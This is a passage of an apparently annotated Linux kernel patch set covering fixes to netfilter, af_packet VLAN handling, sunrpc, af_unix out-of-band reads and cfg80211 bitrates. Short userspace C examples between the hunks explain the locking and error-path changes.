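        printf("%lx %lx\n", map[0], map[3]);   /* all-ones, then zero */
        return 0;
    }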
+diff --git a/net/netfilter/nft_set_pipapo_avx2.c b/net/netfilter/nft_set_pipapo_avx2.c
+index a3a8ddca99189..b8d3c3213efee 100644
+--- a/net/netfilter/nft_set_pipapo_avx2.c
++++ b/net/netfilter/nft_set_pipapo_avx2.c
+@@ -212,8 +212,9 @@ static int nft_pipapo_avx2_refill(int offset, unsigned long *map,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_2(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	u8 pg[2] = { pkt[0] >> 4, pkt[0] & 0xf };
+@@ -274,8 +275,9 @@ static int nft_pipapo_avx2_lookup_4b_2(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_4(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	u8 pg[4] = { pkt[0] >> 4, pkt[0] & 0xf, pkt[1] >> 4, pkt[1] & 0xf };
+@@ -350,8 +352,9 @@ static int nft_pipapo_avx2_lookup_4b_4(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_8(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	u8 pg[8] = {  pkt[0] >> 4,  pkt[0] & 0xf,  pkt[1] >> 4,  pkt[1] & 0xf,
+ 		      pkt[2] >> 4,  pkt[2] & 0xf,  pkt[3] >> 4,  pkt[3] & 0xf,
+@@ -445,8 +448,9 @@ static int nft_pipapo_avx2_lookup_4b_8(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_12(unsigned long *map, unsigned long *fill,
+-				        struct nft_pipapo_field *f, int offset,
+-				        const u8 *pkt, bool first, bool last)
++					const struct nft_pipapo_field *f,
++					int offset, const u8 *pkt,
++					bool first, bool last)
+ {
+ 	u8 pg[12] = {  pkt[0] >> 4,  pkt[0] & 0xf,  pkt[1] >> 4,  pkt[1] & 0xf,
+ 		       pkt[2] >> 4,  pkt[2] & 0xf,  pkt[3] >> 4,  pkt[3] & 0xf,
+@@ -534,8 +538,9 @@ static int nft_pipapo_avx2_lookup_4b_12(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_32(unsigned long *map, unsigned long *fill,
+-					struct nft_pipapo_field *f, int offset,
+-					const u8 *pkt, bool first, bool last)
++					const struct nft_pipapo_field *f,
++					int offset, const u8 *pkt,
++					bool first, bool last)
+ {
+ 	u8 pg[32] = {  pkt[0] >> 4,  pkt[0] & 0xf,  pkt[1] >> 4,  pkt[1] & 0xf,
+ 		       pkt[2] >> 4,  pkt[2] & 0xf,  pkt[3] >> 4,  pkt[3] & 0xf,
+@@ -669,8 +674,9 @@ static int nft_pipapo_avx2_lookup_4b_32(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_1(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -726,8 +732,9 @@ static int nft_pipapo_avx2_lookup_8b_1(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_2(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -790,8 +797,9 @@ static int nft_pipapo_avx2_lookup_8b_2(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_4(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -865,8 +873,9 @@ static int nft_pipapo_avx2_lookup_8b_4(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_6(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -950,8 +959,9 @@ static int nft_pipapo_avx2_lookup_8b_6(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_16(unsigned long *map, unsigned long *fill,
+-					struct nft_pipapo_field *f, int offset,
+-					const u8 *pkt, bool first, bool last)
++					const struct nft_pipapo_field *f,
++					int offset, const u8 *pkt,
++					bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -1026,6 +1036,7 @@ static int nft_pipapo_avx2_lookup_8b_16(unsigned long *map, unsigned long *fill,
+ 
+ /**
+  * nft_pipapo_avx2_lookup_slow() - Fallback function for uncommon field sizes
++ * @mdata:	Matching data, including mapping table
+  * @map:	Previous match result, used as initial bitmap
+  * @fill:	Destination bitmap to be filled with current match result
+  * @f:		Field, containing lookup and mapping tables
+@@ -1041,15 +1052,17 @@ static int nft_pipapo_avx2_lookup_8b_16(unsigned long *map, unsigned long *fill,
+  * Return: -1 on no match, rule index of match if @last, otherwise first long
+  * word index to be checked next (i.e. first filled word).
+  */
+-static int nft_pipapo_avx2_lookup_slow(unsigned long *map, unsigned long *fill,
+-					struct nft_pipapo_field *f, int offset,
+-					const u8 *pkt, bool first, bool last)
++static int nft_pipapo_avx2_lookup_slow(const struct nft_pipapo_match *mdata,
++					unsigned long *map, unsigned long *fill,
++					const struct nft_pipapo_field *f,
++					int offset, const u8 *pkt,
++					bool first, bool last)
+ {
+ 	unsigned long bsize = f->bsize;
+ 	int i, ret = -1, b;
+ 
+ 	if (first)
+-		memset(map, 0xff, bsize * sizeof(*map));
++		pipapo_resmap_init(mdata, map);
+ 
+ 	for (i = offset; i < bsize; i++) {
+ 		if (f->bb == 8)
+@@ -1119,15 +1132,21 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct nft_pipapo_scratch *scratch;
+ 	u8 genmask = nft_genmask_cur(net);
++	const struct nft_pipapo_match *m;
++	const struct nft_pipapo_field *f;
+ 	const u8 *rp = (const u8 *)key;
+-	struct nft_pipapo_match *m;
+-	struct nft_pipapo_field *f;
+ 	unsigned long *res, *fill;
+ 	bool map_index;
+ 	int i, ret = 0;
+ 
+-	if (unlikely(!irq_fpu_usable()))
+-		return nft_pipapo_lookup(net, set, key, ext);
++	local_bh_disable();
++
++	if (unlikely(!irq_fpu_usable())) {
++		bool fallback_res = nft_pipapo_lookup(net, set, key, ext);
++
++		local_bh_enable();
++		return fallback_res;
++	}
+ 
+ 	m = rcu_dereference(priv->match);
+ 
+@@ -1142,6 +1161,7 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 	scratch = *raw_cpu_ptr(m->scratch);
+ 	if (unlikely(!scratch)) {
+ 		kernel_fpu_end();
++		local_bh_enable();
+ 		return false;
+ 	}
+ 
+@@ -1175,7 +1195,7 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 			} else if (f->groups == 16) {
+ 				NFT_SET_PIPAPO_AVX2_LOOKUP(8, 16);
+ 			} else {
+-				ret = nft_pipapo_avx2_lookup_slow(res, fill, f,
++				ret = nft_pipapo_avx2_lookup_slow(m, res, fill, f,
+ 								  ret, rp,
+ 								  first, last);
+ 			}
+@@ -1191,7 +1211,7 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 			} else if (f->groups == 32) {
+ 				NFT_SET_PIPAPO_AVX2_LOOKUP(4, 32);
+ 			} else {
+-				ret = nft_pipapo_avx2_lookup_slow(res, fill, f,
++				ret = nft_pipapo_avx2_lookup_slow(m, res, fill, f,
+ 								  ret, rp,
+ 								  first, last);
+ 			}
+@@ -1222,6 +1242,7 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 	if (i % 2)
+ 		scratch->map_index = !map_index;
+ 	kernel_fpu_end();
++	local_bh_enable();
+ 
+ 	return ret >= 0;
+ }
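
The AVX2 lookup above now brackets both the FPU section and the per-cpu scratch map with local_bh_disable()/local_bh_enable(), so a softirq on the same CPU cannot reuse the scratch area mid-lookup; note how the !irq_fpu_usable() fallback must restore that state before returning. The same guard-and-fallback shape in a userspace analog, with a mutex standing in for BH disabling:

    #include <pthread.h>
    #include <stdbool.h>

    static pthread_mutex_t guard = PTHREAD_MUTEX_INITIALIZER;  /* ~ BH off */

    static bool fast_path_usable(void) { return false; } /* force the fallback */
    static bool slow_lookup(void)      { return true; }
    static bool fast_lookup(void)      { return true; }

    static bool lookup(void)
    {
        bool ret;

        pthread_mutex_lock(&guard);
        if (!fast_path_usable()) {
            ret = slow_lookup();            /* fallback runs inside the guard */
            pthread_mutex_unlock(&guard);   /* ...and must drop it on return */
            return ret;
        }
        ret = fast_lookup();
        pthread_mutex_unlock(&guard);
        return ret;
    }

    int main(void) { return lookup() ? 0 : 1; }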
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index c48cb7664c552..c9c813f731c6e 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -541,6 +541,61 @@ static void *packet_current_frame(struct packet_sock *po,
+ 	return packet_lookup_frame(po, rb, rb->head, status);
+ }
+ 
++static u16 vlan_get_tci(struct sk_buff *skb, struct net_device *dev)
++{
++	u8 *skb_orig_data = skb->data;
++	int skb_orig_len = skb->len;
++	struct vlan_hdr vhdr, *vh;
++	unsigned int header_len;
++
++	if (!dev)
++		return 0;
++
++	/* In the SOCK_DGRAM scenario, skb data starts at the network
++	 * protocol, which is after the VLAN headers. The outer VLAN
++	 * header is at the hard_header_len offset in non-variable
++	 * length link layer headers. If it's a VLAN device, the
++	 * min_header_len should be used to exclude the VLAN header
++	 * size.
++	 */
++	if (dev->min_header_len == dev->hard_header_len)
++		header_len = dev->hard_header_len;
++	else if (is_vlan_dev(dev))
++		header_len = dev->min_header_len;
++	else
++		return 0;
++
++	skb_push(skb, skb->data - skb_mac_header(skb));
++	vh = skb_header_pointer(skb, header_len, sizeof(vhdr), &vhdr);
++	if (skb_orig_data != skb->data) {
++		skb->data = skb_orig_data;
++		skb->len = skb_orig_len;
++	}
++	if (unlikely(!vh))
++		return 0;
++
++	return ntohs(vh->h_vlan_TCI);
++}
++
++static __be16 vlan_get_protocol_dgram(struct sk_buff *skb)
++{
++	__be16 proto = skb->protocol;
++
++	if (unlikely(eth_type_vlan(proto))) {
++		u8 *skb_orig_data = skb->data;
++		int skb_orig_len = skb->len;
++
++		skb_push(skb, skb->data - skb_mac_header(skb));
++		proto = __vlan_get_protocol(skb, proto, NULL);
++		if (skb_orig_data != skb->data) {
++			skb->data = skb_orig_data;
++			skb->len = skb_orig_len;
++		}
++	}
++
++	return proto;
++}
++
+ static void prb_del_retire_blk_timer(struct tpacket_kbdq_core *pkc)
+ {
+ 	del_timer_sync(&pkc->retire_blk_timer);
+@@ -1010,10 +1065,16 @@ static void prb_clear_rxhash(struct tpacket_kbdq_core *pkc,
+ static void prb_fill_vlan_info(struct tpacket_kbdq_core *pkc,
+ 			struct tpacket3_hdr *ppd)
+ {
++	struct packet_sock *po = container_of(pkc, struct packet_sock, rx_ring.prb_bdqc);
++
+ 	if (skb_vlan_tag_present(pkc->skb)) {
+ 		ppd->hv1.tp_vlan_tci = skb_vlan_tag_get(pkc->skb);
+ 		ppd->hv1.tp_vlan_tpid = ntohs(pkc->skb->vlan_proto);
+ 		ppd->tp_status = TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
++	} else if (unlikely(po->sk.sk_type == SOCK_DGRAM && eth_type_vlan(pkc->skb->protocol))) {
++		ppd->hv1.tp_vlan_tci = vlan_get_tci(pkc->skb, pkc->skb->dev);
++		ppd->hv1.tp_vlan_tpid = ntohs(pkc->skb->protocol);
++		ppd->tp_status = TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
+ 	} else {
+ 		ppd->hv1.tp_vlan_tci = 0;
+ 		ppd->hv1.tp_vlan_tpid = 0;
+@@ -2431,6 +2492,10 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+ 			h.h2->tp_vlan_tci = skb_vlan_tag_get(skb);
+ 			h.h2->tp_vlan_tpid = ntohs(skb->vlan_proto);
+ 			status |= TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
++		} else if (unlikely(sk->sk_type == SOCK_DGRAM && eth_type_vlan(skb->protocol))) {
++			h.h2->tp_vlan_tci = vlan_get_tci(skb, skb->dev);
++			h.h2->tp_vlan_tpid = ntohs(skb->protocol);
++			status |= TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
+ 		} else {
+ 			h.h2->tp_vlan_tci = 0;
+ 			h.h2->tp_vlan_tpid = 0;
+@@ -2460,7 +2525,8 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll->sll_halen = dev_parse_header(skb, sll->sll_addr);
+ 	sll->sll_family = AF_PACKET;
+ 	sll->sll_hatype = dev->type;
+-	sll->sll_protocol = skb->protocol;
++	sll->sll_protocol = (sk->sk_type == SOCK_DGRAM) ?
++		vlan_get_protocol_dgram(skb) : skb->protocol;
+ 	sll->sll_pkttype = skb->pkt_type;
+ 	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+@@ -3481,7 +3547,8 @@ static int packet_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		/* Original length was stored in sockaddr_ll fields */
+ 		origlen = PACKET_SKB_CB(skb)->sa.origlen;
+ 		sll->sll_family = AF_PACKET;
+-		sll->sll_protocol = skb->protocol;
++		sll->sll_protocol = (sock->type == SOCK_DGRAM) ?
++			vlan_get_protocol_dgram(skb) : skb->protocol;
+ 	}
+ 
+ 	sock_recv_cmsgs(msg, sk, skb);
+@@ -3536,6 +3603,21 @@ static int packet_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 			aux.tp_vlan_tci = skb_vlan_tag_get(skb);
+ 			aux.tp_vlan_tpid = ntohs(skb->vlan_proto);
+ 			aux.tp_status |= TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
++		} else if (unlikely(sock->type == SOCK_DGRAM && eth_type_vlan(skb->protocol))) {
++			struct sockaddr_ll *sll = &PACKET_SKB_CB(skb)->sa.ll;
++			struct net_device *dev;
++
++			rcu_read_lock();
++			dev = dev_get_by_index_rcu(sock_net(sk), sll->sll_ifindex);
++			if (dev) {
++				aux.tp_vlan_tci = vlan_get_tci(skb, dev);
++				aux.tp_vlan_tpid = ntohs(skb->protocol);
++				aux.tp_status |= TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
++			} else {
++				aux.tp_vlan_tci = 0;
++				aux.tp_vlan_tpid = 0;
++			}
++			rcu_read_unlock();
+ 		} else {
+ 			aux.tp_vlan_tci = 0;
+ 			aux.tp_vlan_tpid = 0;
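
vlan_get_tci(), added above, reads the TCI straight out of the 802.1Q header for SOCK_DGRAM sockets where the tag was not stripped into skb metadata. For reference, a TCI packs PCP, DEI and VID; a short sketch decoding one (struct layout as in <linux/if_vlan.h>):

    #include <stdio.h>
    #include <stdint.h>
    #include <arpa/inet.h>

    struct vlan_hdr {
        uint16_t h_vlan_TCI;
        uint16_t h_vlan_encapsulated_proto;
    };

    int main(void)
    {
        struct vlan_hdr vh = { .h_vlan_TCI = htons(0x6064) };
        uint16_t tci = ntohs(vh.h_vlan_TCI);

        printf("pcp=%u dei=%u vid=%u\n",
               tci >> 13, (tci >> 12) & 1, tci & 0x0fff);
        return 0;
    }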
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index 64b6dd439938e..10d79cb55528d 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1959,7 +1959,6 @@ int smc_conn_create(struct smc_sock *smc, struct smc_init_info *ini)
+  */
+ static u8 smc_compress_bufsize(int size, bool is_smcd, bool is_rmb)
+ {
+-	const unsigned int max_scat = SG_MAX_SINGLE_ALLOC * PAGE_SIZE;
+ 	u8 compressed;
+ 
+ 	if (size <= SMC_BUF_MIN_SIZE)
+@@ -1969,9 +1968,11 @@ static u8 smc_compress_bufsize(int size, bool is_smcd, bool is_rmb)
+ 	compressed = min_t(u8, ilog2(size) + 1,
+ 			   is_smcd ? SMCD_DMBE_SIZES : SMCR_RMBE_SIZES);
+ 
++#ifdef CONFIG_ARCH_NO_SG_CHAIN
+ 	if (!is_smcd && is_rmb)
+ 		/* RMBs are backed by & limited to max size of scatterlists */
+-		compressed = min_t(u8, compressed, ilog2(max_scat >> 14));
++		compressed = min_t(u8, compressed, ilog2((SG_MAX_SINGLE_ALLOC * PAGE_SIZE) >> 14));
++#endif
+ 
+ 	return compressed;
+ }
+diff --git a/net/sunrpc/auth_gss/gss_krb5_keys.c b/net/sunrpc/auth_gss/gss_krb5_keys.c
+index 726c076950c04..fc4639687c0fd 100644
+--- a/net/sunrpc/auth_gss/gss_krb5_keys.c
++++ b/net/sunrpc/auth_gss/gss_krb5_keys.c
+@@ -161,7 +161,7 @@ u32 krb5_derive_key(const struct gss_krb5_enctype *gk5e,
+ 	if (IS_ERR(cipher))
+ 		goto err_return;
+ 	if (crypto_sync_skcipher_setkey(cipher, inkey->data, inkey->len))
+-		goto err_return;
++		goto err_free_cipher;
+ 
+ 	/* allocate and set up buffers */
+ 
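
The krb5_derive_key() fix retargets the setkey failure path from err_return to err_free_cipher so the just-allocated cipher is released. The cleanup-ladder pattern in miniature (all functions here are placeholders):

    #include <stdlib.h>

    struct cipher { int dummy; };

    static struct cipher *alloc_cipher(void)     { return malloc(sizeof(struct cipher)); }
    static int setkey(struct cipher *c, int key) { (void)c; return key < 0; }
    static void free_cipher(struct cipher *c)    { free(c); }

    static int derive(int key)
    {
        struct cipher *cipher;
        int err = -1;

        cipher = alloc_cipher();
        if (!cipher)
            goto err_return;
        if (setkey(cipher, key))
            goto err_free_cipher;   /* jumping to err_return here leaks cipher */

        err = 0;                    /* real key derivation elided */
    err_free_cipher:
        free_cipher(cipher);
    err_return:
        return err;
    }

    int main(void) { return derive(1); }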
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 1dbad41c46145..b6529a9d37d37 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2296,12 +2296,13 @@ call_transmit_status(struct rpc_task *task)
+ 		task->tk_action = call_transmit;
+ 		task->tk_status = 0;
+ 		break;
+-	case -ECONNREFUSED:
+ 	case -EHOSTDOWN:
+ 	case -ENETDOWN:
+ 	case -EHOSTUNREACH:
+ 	case -ENETUNREACH:
+ 	case -EPERM:
++		break;
++	case -ECONNREFUSED:
+ 		if (RPC_IS_SOFTCONN(task)) {
+ 			if (!task->tk_msg.rpc_proc->p_proc)
+ 				trace_xprt_ping(task->tk_xprt,
+diff --git a/net/sunrpc/xprtrdma/frwr_ops.c b/net/sunrpc/xprtrdma/frwr_ops.c
+index ffbf99894970e..47f33bb7bff81 100644
+--- a/net/sunrpc/xprtrdma/frwr_ops.c
++++ b/net/sunrpc/xprtrdma/frwr_ops.c
+@@ -92,7 +92,8 @@ static void frwr_mr_put(struct rpcrdma_mr *mr)
+ 	rpcrdma_mr_push(mr, &mr->mr_req->rl_free_mrs);
+ }
+ 
+-/* frwr_reset - Place MRs back on the free list
++/**
++ * frwr_reset - Place MRs back on @req's free list
+  * @req: request to reset
+  *
+  * Used after a failed marshal. For FRWR, this means the MRs
+diff --git a/net/sunrpc/xprtrdma/verbs.c b/net/sunrpc/xprtrdma/verbs.c
+index 4f71627ba39ce..cb909329a5039 100644
+--- a/net/sunrpc/xprtrdma/verbs.c
++++ b/net/sunrpc/xprtrdma/verbs.c
+@@ -897,6 +897,8 @@ static int rpcrdma_reqs_setup(struct rpcrdma_xprt *r_xprt)
+ 
+ static void rpcrdma_req_reset(struct rpcrdma_req *req)
+ {
++	struct rpcrdma_mr *mr;
++
+ 	/* Credits are valid for only one connection */
+ 	req->rl_slot.rq_cong = 0;
+ 
+@@ -906,7 +908,19 @@ static void rpcrdma_req_reset(struct rpcrdma_req *req)
+ 	rpcrdma_regbuf_dma_unmap(req->rl_sendbuf);
+ 	rpcrdma_regbuf_dma_unmap(req->rl_recvbuf);
+ 
+-	frwr_reset(req);
++	/* The verbs consumer can't know the state of an MR on the
++	 * req->rl_registered list unless a successful completion
++	 * has occurred, so they cannot be re-used.
++	 */
++	while ((mr = rpcrdma_mr_pop(&req->rl_registered))) {
++		struct rpcrdma_buffer *buf = &mr->mr_xprt->rx_buf;
++
++		spin_lock(&buf->rb_lock);
++		list_del(&mr->mr_all);
++		spin_unlock(&buf->rb_lock);
++
++		frwr_mr_release(mr);
++	}
+ }
+ 
+ /* ASSUMPTION: the rb_allreqs list is stable for the duration,
+diff --git a/net/tipc/udp_media.c b/net/tipc/udp_media.c
+index 0a85244fd6188..73e461dc12d7b 100644
+--- a/net/tipc/udp_media.c
++++ b/net/tipc/udp_media.c
+@@ -135,8 +135,11 @@ static int tipc_udp_addr2str(struct tipc_media_addr *a, char *buf, int size)
+ 		snprintf(buf, size, "%pI4:%u", &ua->ipv4, ntohs(ua->port));
+ 	else if (ntohs(ua->proto) == ETH_P_IPV6)
+ 		snprintf(buf, size, "%pI6:%u", &ua->ipv6, ntohs(ua->port));
+-	else
++	else {
+ 		pr_err("Invalid UDP media address\n");
++		return 1;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 3905cdcaa5184..db71f35b67b86 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2710,10 +2710,49 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 
+ static int unix_stream_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
++	struct unix_sock *u = unix_sk(sk);
++	struct sk_buff *skb;
++	int err;
++
+ 	if (unlikely(READ_ONCE(sk->sk_state) != TCP_ESTABLISHED))
+ 		return -ENOTCONN;
+ 
+-	return unix_read_skb(sk, recv_actor);
++	mutex_lock(&u->iolock);
++	skb = skb_recv_datagram(sk, MSG_DONTWAIT, &err);
++	mutex_unlock(&u->iolock);
++	if (!skb)
++		return err;
++
++#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
++	if (unlikely(skb == READ_ONCE(u->oob_skb))) {
++		bool drop = false;
++
++		unix_state_lock(sk);
++
++		if (sock_flag(sk, SOCK_DEAD)) {
++			unix_state_unlock(sk);
++			kfree_skb(skb);
++			return -ECONNRESET;
++		}
++
++		spin_lock(&sk->sk_receive_queue.lock);
++		if (likely(skb == u->oob_skb)) {
++			WRITE_ONCE(u->oob_skb, NULL);
++			drop = true;
++		}
++		spin_unlock(&sk->sk_receive_queue.lock);
++
++		unix_state_unlock(sk);
++
++		if (drop) {
++			WARN_ON_ONCE(skb_unref(skb));
++			kfree_skb(skb);
++			return -EAGAIN;
++		}
++	}
++#endif
++
++	return recv_actor(sk, skb);
+ }
+ 
+ static int unix_stream_read_generic(struct unix_stream_read_state *state,
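
The new unix_stream_read_skb() dequeues first and only then handles the case where the skb is the pending out-of-band one: a cheap unlocked comparison, then an authoritative re-check under the receive-queue lock before clearing the pointer. The general double-check shape, sketched with pthreads:

    #include <pthread.h>
    #include <stdbool.h>
    #include <stddef.h>

    static pthread_mutex_t queue_lock = PTHREAD_MUTEX_INITIALIZER;
    static void *oob_item;   /* stand-in for u->oob_skb */

    static bool consume_if_oob(void *item)
    {
        bool drop = false;

        if (item != oob_item)        /* unlocked hint; may be stale */
            return false;

        pthread_mutex_lock(&queue_lock);
        if (item == oob_item) {      /* authoritative re-check */
            oob_item = NULL;
            drop = true;
        }
        pthread_mutex_unlock(&queue_lock);
        return drop;
    }

    int main(void)
    {
        int x;

        oob_item = &x;
        return consume_if_oob(&x) ? 0 : 1;
    }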
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index bd84785bf8d6c..bca2d86ba97d8 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -54,6 +54,9 @@ static int unix_bpf_recvmsg(struct sock *sk, struct msghdr *msg,
+ 	struct sk_psock *psock;
+ 	int copied;
+ 
++	if (flags & MSG_OOB)
++		return -EOPNOTSUPP;
++
+ 	if (!len)
+ 		return 0;
+ 
+diff --git a/net/wireless/util.c b/net/wireless/util.c
+index 73b3648e1b4c3..1665320d22146 100644
+--- a/net/wireless/util.c
++++ b/net/wireless/util.c
+@@ -1373,7 +1373,7 @@ static u32 cfg80211_calculate_bitrate_he(struct rate_info *rate)
+ 		  5120, /*  0.833333... */
+ 	};
+ 	u32 rates_160M[3] = { 960777777, 907400000, 816666666 };
+-	u32 rates_969[3] =  { 480388888, 453700000, 408333333 };
++	u32 rates_996[3] =  { 480388888, 453700000, 408333333 };
+ 	u32 rates_484[3] =  { 229411111, 216666666, 195000000 };
+ 	u32 rates_242[3] =  { 114711111, 108333333,  97500000 };
+ 	u32 rates_106[3] =  {  40000000,  37777777,  34000000 };
+@@ -1393,12 +1393,14 @@ static u32 cfg80211_calculate_bitrate_he(struct rate_info *rate)
+ 	if (WARN_ON_ONCE(rate->nss < 1 || rate->nss > 8))
+ 		return 0;
+ 
+-	if (rate->bw == RATE_INFO_BW_160)
++	if (rate->bw == RATE_INFO_BW_160 ||
++	    (rate->bw == RATE_INFO_BW_HE_RU &&
++	     rate->he_ru_alloc == NL80211_RATE_INFO_HE_RU_ALLOC_2x996))
+ 		result = rates_160M[rate->he_gi];
+ 	else if (rate->bw == RATE_INFO_BW_80 ||
+ 		 (rate->bw == RATE_INFO_BW_HE_RU &&
+ 		  rate->he_ru_alloc == NL80211_RATE_INFO_HE_RU_ALLOC_996))
+-		result = rates_969[rate->he_gi];
++		result = rates_996[rate->he_gi];
+ 	else if (rate->bw == RATE_INFO_BW_40 ||
+ 		 (rate->bw == RATE_INFO_BW_HE_RU &&
+ 		  rate->he_ru_alloc == NL80211_RATE_INFO_HE_RU_ALLOC_484))
+diff --git a/scripts/Makefile.lib b/scripts/Makefile.lib
+index 3aa384cec76b8..d236e5658f9b1 100644
+--- a/scripts/Makefile.lib
++++ b/scripts/Makefile.lib
+@@ -382,8 +382,12 @@ cmd_dtc = $(HOSTCC) -E $(dtc_cpp_flags) -x assembler-with-cpp -o $(dtc-tmp) $< ;
+ 		-d $(depfile).dtc.tmp $(dtc-tmp) ; \
+ 	cat $(depfile).pre.tmp $(depfile).dtc.tmp > $(depfile)
+ 
++# NOTE:
++# Do not replace $(filter %.dtb %.dtbo, $^) with $(real-prereqs). When a single
++# DTB is turned into a multi-blob DTB, $^ will contain header file dependencies
++# recorded in the .*.cmd file.
+ quiet_cmd_fdtoverlay = DTOVL   $@
+-      cmd_fdtoverlay = $(objtree)/scripts/dtc/fdtoverlay -o $@ -i $(real-prereqs)
++      cmd_fdtoverlay = $(objtree)/scripts/dtc/fdtoverlay -o $@ -i $(filter %.dtb %.dtbo, $^)
+ 
+ $(multi-dtb-y): FORCE
+ 	$(call if_changed,fdtoverlay)
+diff --git a/scripts/gcc-x86_32-has-stack-protector.sh b/scripts/gcc-x86_32-has-stack-protector.sh
+index 825c75c5b7150..9459ca4f0f11f 100755
+--- a/scripts/gcc-x86_32-has-stack-protector.sh
++++ b/scripts/gcc-x86_32-has-stack-protector.sh
+@@ -5,4 +5,4 @@
+ # -mstack-protector-guard-reg, added by
+ # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=81708
+ 
